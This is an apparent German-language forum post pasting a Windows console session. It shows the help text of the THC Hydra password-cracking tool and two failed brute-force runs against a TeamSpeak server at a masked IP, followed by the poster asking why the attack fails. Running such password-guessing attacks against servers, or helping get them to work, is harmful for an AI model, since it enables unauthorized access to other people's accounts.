Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Dokumente und Einstellungen\Heri>cd\

Hydra v5.3 [] (c) 2006 by van Hauser / THC <>

Syntax: hydra/hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at

C:\>hydra\hydra.exe -L C:\hydra\loginname.txt -P C:\hydra\passwortliste.txt -s 8
767 **.***.***.** teamspeak
Error: File for logins not found!

C:\>hydra\hydra.exe -l C:\hydra\loginname.txt -p C:\hydra\passwortliste.txt -s 8
767 ++.+++.+++.++ teamspeak
Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra ( starting at 2007-09-26 02:46:05
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service teamspeak on port 8767
[STATUS] attack finished for (waiting for childs to finish)
Hydra ( finished at 2007-09-26 02:46:07

da ich war auf ein ts und habe das pw von admin in der liste beigeschrieben aber trozdem kamm nur das hier bei raus ? mach ich irgenwas falsch oder so ?

Added after 15 hours 37 minutes:

kann mir mal bitte einer sagen ib ich da was falsches mache oder net ? da oben